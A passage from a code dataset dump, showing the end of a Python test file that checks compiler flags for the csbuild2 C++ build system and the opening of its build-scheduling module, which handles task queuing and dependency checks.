\"--target=embeddedsymbols_sizeopt_static_release\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/Z7\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/O1\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MT\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DEXPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-Os\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.ExplicitDefineIsPresent, CppFeaturesTest.ImplicitDefineIsPresent)))\n\n\tdef testExternalSymbolsSpeedOptDynamicDebugRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=externalsymbols_speedopt_dynamic_debug\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=externalsymbols_speedopt_dynamic_debug\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/Zi\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/O2\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MDd\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/UIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telif platform.system() == \"Linux\":\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-Ofast\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.NoExplicitDefine, CppFeaturesTest.NoImplicitDefine)))\n\n\tdef testExternalPlusSymbolsMaxOptStaticDebugRuntime(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=externalplussymbols_maxopt_static_debug\"]\n\t\t_, out, _ = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=externalplussymbols_maxopt_static_debug\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/ZI\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/Ox\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/MTd\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/DEXPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/UIMPLICIT_DEFINE\\s\", re.M).search(out), None)\n\t\telif platform.system() == \"Linux\":\n\t\t\tself.assertIsNot(re.compile(R\"-g\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-O3\\s\", re.M).search(out), None)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"{} - {}\".format(CppFeaturesTest.ExplicitDefineIsPresent, CppFeaturesTest.NoImplicitDefine)))\n\n\tdef testCustomOptions(self):\n\t\t\"\"\"Test that the correct compiler options are being set.\"\"\"\n\t\tself.cleanArgs = [\"--project=hello_world\", \"--target=custom_options\"]\n\t\t_, out, err = self.assertMakeSucceeds(\"--show-commands\", \"--project=hello_world\", \"--target=custom_options\")\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.assertIsNot(re.compile(R\"/W4\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"/STACK:1048576\\s\", re.M).search(out), None)\n\t\t\tself.assertIn(\"warning C4101: 'unused': unreferenced local variable\", out)\n\t\telse:\n\t\t\tself.assertIsNot(re.compile(R\"-Wunused-variable\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"-shared-libgcc\\s\", re.M).search(out), None)\n\t\t\tself.assertIsNot(re.compile(R\"warning: unused variable .unused. \\[-Wunused-variable\\]\").search(err), None)\n" }, { "alpha_fraction": 0.7012463808059692, "alphanum_fraction": 0.7066953182220459, "avg_line_length": 36.47965621948242, "blob_id": "53403d76c4399b5fcd22c74e230dfabd8aa82d5a", "content_id": "ec7ba8888bb835a93f8073c54ff607a2d866cfe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47899, "license_type": "no_license", "max_line_length": 189, "num_lines": 1278, "path": "/csbuild/_build/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: _build\n\t:synopsis: Logic related to actually running a build\n\"\"\"\n\n# Import this stuff to appease pylint\nfrom __future__ import unicode_literals, division, print_function\n\nimport shutil\n\nimport csbuild\nimport argparse\nimport os\nimport sys\nimport imp\nimport math\nimport multiprocessing\nimport time\nimport threading\nimport collections\n\nfrom . import recompile\nfrom . import project_plan, project, input_file\nfrom .. import log, commands, tools, perf_timer\nfrom .._utils import system, shared_globals, thread_pool, terminfo, ordered_set, FormatTime, queue, dag, MultiBreak, PlatformString, settings_manager\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass _dummy(object):\n\tdef __setattr__(self, key, value):\n\t\tpass\n\tdef __getattribute__(self, item):\n\t\treturn \"\"\n\n_runningBuilds = 0\n\ndef _canRun(tool):\n\treturn tool.maxParallel <= 0 or tool.curParallel < tool.maxParallel\n\ndef _enqueueBuild(buildProject, tool, buildInput, pool, projectList, projectsWithCrossProjectDeps, inputExtension, doCompileCheck=False):\n\twith perf_timer.PerfTimer(\"Enqueuing build tasks\"):\n\t\tglobal _runningBuilds\n\t\t_runningBuilds += 1\n\t\ttool.curParallel += 1\n\t\tshared_globals.totalBuilds += 1\n\t\tlog.UpdateProgressBar()\n\n\t\tbuildProject.toolchain.CreateReachability(tool)\n\n\t\tif tool.exclusive:\n\t\t\ttry:\n\t\t\t\tbuildProject.inputFiles[inputExtension].remove(buildInput)\n\t\t\texcept KeyError:\n\t\t\t\t#Wasn't in there so nothing to remove.\n\t\t\t\tpass\n\n\t\tif buildInput is None:\n\t\t\tbuildProject.toolchain.DeactivateTool(tool)\n\t\t\tlog.Info(\"Enqueuing null-input build for {} for project {}\", tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.Run, tool, buildProject.toolchain, buildProject, None, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, None, None)\n\t\t\t)\n\t\telif isinstance(buildInput, input_file.InputFile):\n\t\t\tbuildInput.AddUsedTool(tool)\n\t\t\tlog.Info(\"Enqueuing build for {} using {} for project {}\", buildInput, tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.Run, tool, buildProject.toolchain, buildProject, buildInput, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, inputExtension, [buildInput])\n\t\t\t)\n\t\telse:\n\t\t\tfor inputFile in buildInput:\n\t\t\t\tinputFile.AddUsedTool(tool)\n\n\t\t\tlog.Info(\"Enqueuing multi-build task for {} using {} for project {}\", buildProject, buildInput, tool.__name__, buildProject)\n\t\t\tpool.AddTask(\n\t\t\t\t(_logThenRun, tool.RunGroup, tool, buildProject.toolchain, buildProject, buildInput, doCompileCheck),\n\t\t\t\t(_buildFinished, pool, projectList, projectsWithCrossProjectDeps, buildProject, tool, None, buildInput)\n\t\t\t)\n\ndef _dependenciesMet(buildProject, tool):\n\twith perf_timer.PerfTimer(\"Dependency checks\"):\n\t\tlog.Info(\"Checking if we can enqueue a new build for tool {} for project {}\", tool.__name__, buildProject)\n\t\tfor dependProject in buildProject.dependencies:\n\t\t\tfor dependency in tool.crossProjectDependencies:\n\t\t\t\tif dependProject.toolchain.IsOutputActive(dependency):\n\t\t\t\t\treturn False\n\n\t\tfor dependency in tool.dependencies:\n\t\t\tif buildProject.toolchain.IsOutputActive(dependency):\n\t\t\t\treturn False\n\t\treturn True\n\ndef _getGroupInputFiles(buildProject, tool):\n\twith perf_timer.PerfTimer(\"Collecting group inputs\"):\n\t\tfileList = ordered_set.OrderedSet()\n\t\tif tool.crossProjectInputGroups:\n\t\t\tfor inputFile in tool.crossProjectInputGroups:\n\t\t\t\tlog.Info(\"Checking if all cross-project builds for {} are done yet\", inputFile)\n\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\tlog.Info(\"Extension {} is still active, can't build yet.\", inputFile)\n\t\t\t\t\treturn None\n\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\tif dep.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\tlog.Info(\"Extension {} is still active in dependent project, can't build yet.\", inputFile)\n\t\t\t\t\t\treturn None\n\t\t\t\tlog.Info(\"{} is ok to build.\", inputFile)\n\t\t\t\tfileList.update([x for x in buildProject.inputFiles.get(inputFile, []) if not x.WasToolUsed(tool)])\n\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\tfileList.update(dep.inputFiles.get(inputFile, []))\n\t\telse:\n\t\t\tfor inputFile in tool.inputGroups:\n\t\t\t\tlog.Info(\"Checking if all builds for {} are done yet\", inputFile)\n\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\tlog.Info(\"Extension {} is still active, can't build yet.\", inputFile)\n\t\t\t\t\treturn None\n\t\t\t\tlog.Info(\"{} is ok to build.\", inputFile)\n\t\t\t\tfileList.update([x for x in buildProject.inputFiles.get(inputFile, []) if not x.WasToolUsed(tool)])\n\t\treturn fileList\n\ndef _checkDependenciesPreBuild(checkProject, tool, dependencies):\n\twith perf_timer.PerfTimer(\"Dependency checks\"):\n\t\tlog.Info(\"Checking if we can enqueue a new build for tool {} for project {}\", checkProject, tool.__name__, checkProject)\n\t\tfor dependency in dependencies:\n\t\t\tfor checkTool in checkProject.toolchain.GetAllTools():\n\t\t\t\tif checkTool.inputFiles is None:\n\t\t\t\t\textensionSet = checkTool.inputGroups | checkTool.crossProjectInputGroups\n\t\t\t\telse:\n\t\t\t\t\textensionSet = checkTool.inputFiles | checkTool.inputGroups | checkTool.crossProjectInputGroups\n\t\t\t\thasExtension = False\n\t\t\t\tfor dependentExtension in extensionSet:\n\t\t\t\t\tif checkProject.inputFiles.get(dependentExtension):\n\t\t\t\t\t\thasExtension = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif hasExtension and checkProject.toolchain.CanCreateOutput(checkTool, dependency):\n\t\t\t\t\treturn False\n\t\treturn True\n\ndef _logThenRun(function, buildTool, buildToolchain, buildProject, inputFiles, doCompileCheck):\n\t\"\"\"\n\t:type buildProject: project.Project\n\t\"\"\"\n\tif inputFiles is not None:\n\t\tforceRebuild = False\n\t\tlog.Info(\"Checking whether to recompile {} for tool {} with cross-project dependencies {}\", inputFiles, buildTool.__name__, buildTool.crossProjectDependencies)\n\t\tfor dep in buildTool.crossProjectDependencies:\n\t\t\tlog.Info(\"Checking cross-project dependency '{}'\", dep)\n\t\t\tfor otherProj in buildProject.dependencies:\n\t\t\t\tlog.Info(\"Checking up-stream project {}, which has built files of type {} this run\", otherProj.name, otherProj.builtThisRun.keys())\n\t\t\t\tif dep in otherProj.builtThisRun:\n\t\t\t\t\tlog.Info(\"Found a cross-project recompile trigger, recompiling\")\n\t\t\t\t\tforceRebuild = True\n\t\t\t\t\tbreak\n\t\t\tif forceRebuild:\n\t\t\t\tbreak\n\t\tif not forceRebuild:\n\t\t\tif doCompileCheck:\n\t\t\t\twith perf_timer.PerfTimer(\"Recompile checks\"):\n\t\t\t\t\tif isinstance(inputFiles, ordered_set.OrderedSet):\n\t\t\t\t\t\textension = os.path.splitext(list(inputFiles)[0].filename)[1]\n\t\t\t\t\t\tfileList = inputFiles\n\t\t\t\t\telse:\n\t\t\t\t\t\textension = os.path.splitext(inputFiles.filename)[1]\n\t\t\t\t\t\tfileList = ordered_set.OrderedSet([inputFiles])\n\n\t\t\t\t\tlastResult = buildProject.GetLastResult(inputFiles)\n\t\t\t\t\tif lastResult is not None \\\n\t\t\t\t\t\t\tand not recompile.ShouldRecompile(buildProject, buildProject.toolchain.GetChecker(extension), fileList):\n\t\t\t\t\t\tlog.Info(\"Previous result exists and input has not changed. Returning previous result.\")\n\t\t\t\t\t\treturn tuple(lastResult), True\n\t\t\telse:\n\t\t\t\tif isinstance(inputFiles, ordered_set.OrderedSet):\n\t\t\t\t\tfileList = inputFiles\n\t\t\t\telse:\n\t\t\t\t\tfileList = ordered_set.OrderedSet([inputFiles])\n\n\t\t\t\tlastResult = buildProject.GetLastResult(inputFiles)\n\t\t\t\tif lastResult is not None:\n\t\t\t\t\tfilesNeedingBuild = [f for f in fileList if not f.upToDate]\n\t\t\t\t\tif not filesNeedingBuild:\n\t\t\t\t\t\tlog.Info(\"Previous result exists and input has not changed. Returning previous result.\")\n\t\t\t\t\t\treturn tuple(lastResult), True\n\n\n\twith perf_timer.PerfTimer(\"Tool execution\"):\n\t\tlog.Info(\"Processing {} with {} for project {}\", \"null-input build\" if inputFiles is None else inputFiles, buildTool.__name__, buildProject)\n\n\t\twith buildToolchain.Use(buildTool):\n\t\t\treturn function(buildToolchain, buildProject, inputFiles), False\n\n@TypeChecked(\n\tpool=thread_pool.ThreadPool,\n\tprojectList=list,\n\tprojectsWithCrossProjectDeps=list,\n\tbuildProject=project.Project,\n\ttoolUsed=(_classType, _typeType),\n\tinputExtension=(String, type(None)),\n\tinputFiles=(list, ordered_set.OrderedSet, type(None)),\n\toutputFiles=(String, tuple),\n\tupToDate=bool\n)\ndef _buildFinished(pool, projectList, projectsWithCrossProjectDeps, buildProject, toolUsed, inputExtension, inputFiles, outputFiles, upToDate):\n\t\"\"\"\n\tBuild has finished, enqueue another one.\n\n\t:param pool: thread pool\n\t:type pool: thread_pool.ThreadPool\n\t:param projectList: list of all projects\n\t:type projectList: list[project.Project]\n\t:param projectsWithCrossProjectDeps: List of projects that contain cross-project dependencies\n\t:type projectsWithCrossProjectDeps: list[project.Project]\n\t:param buildProject: project\n\t:type buildProject: project.Project\n\t:param toolUsed: tool used to build it\n\t:type toolUsed: type\n\t:param inputExtension: Extension taken as input\n\t:type inputExtension: str, bytes\n\t:param inputFiles: inputs used for this build\n\t:type inputFiles: list[input_file.InputFile]\n\t:param outputFiles: output generated by the build\n\t:type outputFiles: tuple, str, bytes\n\t:param upToDate: Whether or not the file was already up to date. If so, no build was actually performed.\n\t:type upToDate: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Post-build processing\"):\n\t\ttoolUsed.curParallel -= 1\n\t\tglobal _runningBuilds\n\t\t_runningBuilds -= 1\n\t\tbuildProject.toolchain.ReleaseReachability(toolUsed)\n\n\t\twith perf_timer.PerfTimer(\"Checking for tool completion\"):\n\t\t\tif buildProject.toolchain.IsToolActive(toolUsed):\n\t\t\t\tdone = True\n\n\t\t\t\tremainingInputs = [x for x in buildProject.inputFiles.get(inputExtension, []) if not x.WasToolUsed(toolUsed)]\n\n\t\t\t\tif not remainingInputs:\n\t\t\t\t\t# Technically this will happen before the tool is finished building, so we need the\n\t\t\t\t\t# above guard to keep from doing it twice and tossing up exceptions.\n\t\t\t\t\t# The important thing here is that this will stop us from doing a lot of logic further\n\t\t\t\t\t# down to see if we can build for tools that we know we can't build for.\n\t\t\t\t\tif toolUsed.inputFiles is not None:\n\t\t\t\t\t\tfor inputFile in toolUsed.inputFiles:\n\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif done:\n\t\t\t\t\t\tfor inputFile in toolUsed.inputGroups:\n\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\tfor inputFile in toolUsed.crossProjectInputGroups:\n\t\t\t\t\t\t\t\tif buildProject.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif done:\n\t\t\t\t\t\t\t\t\tfor dep in buildProject.dependencies:\n\t\t\t\t\t\t\t\t\t\tif dep.toolchain.IsOutputActive(inputFile):\n\t\t\t\t\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\tif not done:\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif done:\n\t\t\t\t\t\tlog.Info(\"Tool {} has finished building for project {}\", toolUsed.__name__, buildProject)\n\t\t\t\t\t\tbuildProject.toolchain.DeactivateTool(toolUsed)\n\n\t\tif not isinstance(outputFiles, tuple):\n\t\t\toutputFiles = (outputFiles, )\n\n\t\textensionsToCheck = set()\n\t\tfor outputFile in outputFiles:\n\t\t\tlog.Info(\n\t\t\t\t\"Checking for new tasks created by {}\",\n\t\t\t\tos.path.basename(outputFile)\n\t\t\t)\n\n\t\t\twith perf_timer.PerfTimer(\"Processing new inputs\"):\n\t\t\t\tbuildProject.AddArtifact(inputFiles, outputFile)\n\n\t\t\t\toutputExtension = os.path.splitext(outputFile)[1]\n\t\t\t\tif not upToDate:\n\t\t\t\t\tbuildProject.builtThisRun.setdefault(outputExtension, set()).add(outputFile)\n\t\t\t\textensionsToCheck.add(outputExtension)\n\n\t\t\t\tif inputExtension == outputExtension:\n\t\t\t\t\tnewInput = input_file.InputFile(outputFile, inputFiles, upToDate=upToDate)\n\t\t\t\telse:\n\t\t\t\t\tnewInput = input_file.InputFile(outputFile, upToDate=upToDate)\n\n\t\t\t\tbuildProject.inputFiles.setdefault(outputExtension, ordered_set.OrderedSet()).add(newInput)\n\n\t\t\t\t# Enqueue this file immediately in any tools that take it as a single input, unless they're marked to delay.\n\t\t\t\ttoolList = buildProject.toolchain.GetToolsFor(outputExtension, newInput.toolsUsed)\n\t\t\t\tfor tool in toolList:\n\t\t\t\t\tif not buildProject.toolchain.IsToolActive(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif not _dependenciesMet(buildProject, tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif newInput.WasToolUsed(tool):\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t_enqueueBuild(buildProject, tool, newInput, pool, projectList, projectsWithCrossProjectDeps, outputExtension)\n\n\t\tfor outputExtension in extensionsToCheck:\n\t\t\tisActive = buildProject.toolchain.IsOutputActive(outputExtension)\n\t\t\tlog.Info(\"Checking if {} is still active... {}\", outputExtension if outputExtension else \"<no extension>\", \"yes\" if isActive else \"no\")\n\n\t\t\t# If this was the last file being built of its extension, check whether we can pass it and maybe others to relevant group input tools\n\t\t\tif not isActive:\n\t\t\t\twith perf_timer.PerfTimer(\"Checking for newly enabled tools\"):\n\t\t\t\t\ttoolList = buildProject.toolchain.GetActiveTools()\n\t\t\t\t\tfor tool in toolList:\n\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif not _dependenciesMet(buildProject, tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif tool.inputFiles is None:\n\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, None, pool, projectList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor ext in tool.inputFiles:\n\t\t\t\t\t\t\t\twith perf_timer.PerfTimer(\"Enqueuing single-input builds\"):\n\t\t\t\t\t\t\t\t\tfor projectInput in [x for x in buildProject.inputFiles.get(ext, []) if not x.WasToolUsed(tool)]:\n\t\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, projectInput, pool, projectList, projectsWithCrossProjectDeps, ext)\n\n\t\t\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t# Check for group inputs that have been freed and queue up if all are free\n\t\t\t\t\t\tfileList = _getGroupInputFiles(buildProject, tool)\n\n\t\t\t\t\t\tif not fileList:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t_enqueueBuild(buildProject, tool, fileList, pool, projectList, projectsWithCrossProjectDeps, None)\n\n\t\t\t\t\t# Check to see if we've freed up any pending builds in other projects as well\n\t\t\t\t\twith perf_timer.PerfTimer(\"Cross-project dependency checks\"):\n\t\t\t\t\t\tfor proj in projectsWithCrossProjectDeps:\n\t\t\t\t\t\t\ttoolList = proj.toolchain.GetActiveTools()\n\t\t\t\t\t\t\tfor tool in toolList:\n\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\n\t\t\t\t\t\t\t\tif outputExtension not in tool.crossProjectDependencies and outputExtension not in tool.crossProjectInputGroups:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tif not _dependenciesMet(proj, tool):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tif tool.inputFiles is None:\n\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, None, pool, projectList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfor ext in tool.inputFiles:\n\t\t\t\t\t\t\t\t\t\twith perf_timer.PerfTimer(\"Enqueuing single-input builds\"):\n\t\t\t\t\t\t\t\t\t\t\tfor projectInput in [x for x in proj.inputFiles.get(ext, []) if not x.WasToolUsed(tool)]:\n\t\t\t\t\t\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, projectInput, pool, projectList, projectsWithCrossProjectDeps, ext)\n\n\t\t\t\t\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\tfileList = _getGroupInputFiles(proj, tool)\n\n\t\t\t\t\t\t\t\tif not fileList:\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t_enqueueBuild(proj, tool, fileList, pool, projectList, projectsWithCrossProjectDeps, None)\n\n\t\tshared_globals.completedBuilds += 1\n\n\t\tif upToDate:\n\t\t\tlogFn = log.Info\n\t\telse:\n\t\t\tlogFn = log.Build\n\t\tmainFileDir = os.path.dirname(sys.modules[\"__main__\"].__file__)\n\t\tlogFn(\n\t\t\t\"Finished building {} => {}\",\n\t\t\t\"null-input for {} for project {}\".format(toolUsed.__name__, buildProject) if inputFiles is None else inputFiles,\n\t\t\t[os.path.relpath(PlatformString(outputFile), mainFileDir).replace(\"\\\\\", \"/\") for outputFile in outputFiles]\n\t\t\t\tif isinstance(outputFiles, tuple) else os.path.relpath(outputFiles, mainFileDir).replace(\"\\\\\", \"/\")\n\t\t)\n\t\tif shared_globals.verbosity > shared_globals.Verbosity.Verbose:\n\t\t\tlog.UpdateProgressBar()\n\n\t\tif _runningBuilds == 0:\n\t\t\t# We have no builds running and finishing this build did not spawn a new one\n\t\t\t# Time to exit.\n\t\t\tpool.Stop()\n\n\n@TypeChecked(numThreads=int, projectBuildList=list, _return=int)\ndef _build(numThreads, projectBuildList):\n\t\"\"\"\n\tRun a build.\n\n\t:param numThreads: Number of threads\n\t:type numThreads: int\n\t:param projectBuildList: List of projects\n\t:type projectBuildList: list[project.Project]\n\t:return: Number of failures\n\t:rtype: int\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Enqueuing initial builds\"):\n\t\tlog.Build(\"Starting builds\")\n\t\tbuildStart = time.time()\n\t\tglobal _runningBuilds\n\t\tcallbackQueue = queue.Queue()\n\t\tpool = thread_pool.ThreadPool(numThreads, callbackQueue)\n\t\tqueuedSomething = False\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor tool in buildProject.toolchain.GetAllTools():\n\t\t\t\ttool.curParallel = 0\n\n\t\tfailures = 0\n\t\tpool.Start()\n\n\t\tprojectsWithCrossProjectDeps = []\n\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor tool in buildProject.toolchain.GetAllTools():\n\t\t\t\tif tool.crossProjectDependencies or tool.crossProjectInputGroups:\n\t\t\t\t\tprojectsWithCrossProjectDeps.append(buildProject)\n\t\t\t\t\tbreak\n\n\t\tfor buildProject in projectBuildList:\n\t\t\tfor extension, fileList in [(None, None)] + list(buildProject.inputFiles.items()):\n\t\t\t\tlog.Info(\"Enqueuing tasks for extension {}\", extension)\n\t\t\t\ttoolList = buildProject.toolchain.GetToolsFor(extension)\n\t\t\t\tfor tool in toolList:\n\t\t\t\t\ttry:\n\t\t\t\t\t\t# For the first pass, if ANY tool in the toolchain is capable of producing this output\n\t\t\t\t\t\t# anywhere in its path, AND any inputs exist for that tool, we won't queue up a build\n\t\t\t\t\t\tfor dependProject in buildProject.dependencies:\n\t\t\t\t\t\t\tif not _checkDependenciesPreBuild(dependProject, tool, tool.crossProjectDependencies):\n\t\t\t\t\t\t\t\traise MultiBreak\n\n\t\t\t\t\t\tif not _checkDependenciesPreBuild(buildProject, tool, tool.dependencies):\n\t\t\t\t\t\t\traise MultiBreak\n\n\t\t\t\t\texcept MultiBreak:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif fileList is None and extension is None:\n\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif not buildProject.toolchain.IsToolActive(tool):\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t_enqueueBuild(buildProject, tool, None, pool, projectBuildList, projectsWithCrossProjectDeps, None)\n\t\t\t\t\t\tqueuedSomething = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.Info(\"Looking at files {}\", fileList)\n\t\t\t\t\t\tfor inputFile in list(fileList): #Make a list out of this so it doesn't get a modified-during-iteration error\n\t\t\t\t\t\t\tif not _canRun(tool):\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t_enqueueBuild(buildProject, tool, inputFile, pool, projectBuildList, projectsWithCrossProjectDeps, extension, True)\n\t\t\t\t\t\t\tqueuedSomething = True\n\n\t\t\ttoolList = buildProject.toolchain.GetAllTools()\n\t\t\tlog.Info(\"Checking for group inputs we can run already\")\n\t\t\tfor tool in toolList:\n\t\t\t\tif not tool.inputGroups and not tool.crossProjectInputGroups:\n\t\t\t\t\tcontinue\n\n\t\t\t\tif not _canRun(tool):\n\t\t\t\t\tcontinue\n\n\t\t\t\ttry:\n\t\t\t\t\tfor dependProject in buildProject.dependencies:\n\t\t\t\t\t\tif not _checkDependenciesPreBuild(dependProject, tool, tool.crossProjectDependencies):\n\t\t\t\t\t\t\traise MultiBreak()\n\n\t\t\t\t\tif not _checkDependenciesPreBuild(buildProject, tool, tool.dependencies):\n\t\t\t\t\t\traise MultiBreak()\n\n\t\t\t\texcept MultiBreak:\n\t\t\t\t\tcontinue\n\n\t\t\t\tfileList = _getGroupInputFiles(buildProject, tool)\n\n\t\t\t\tif not 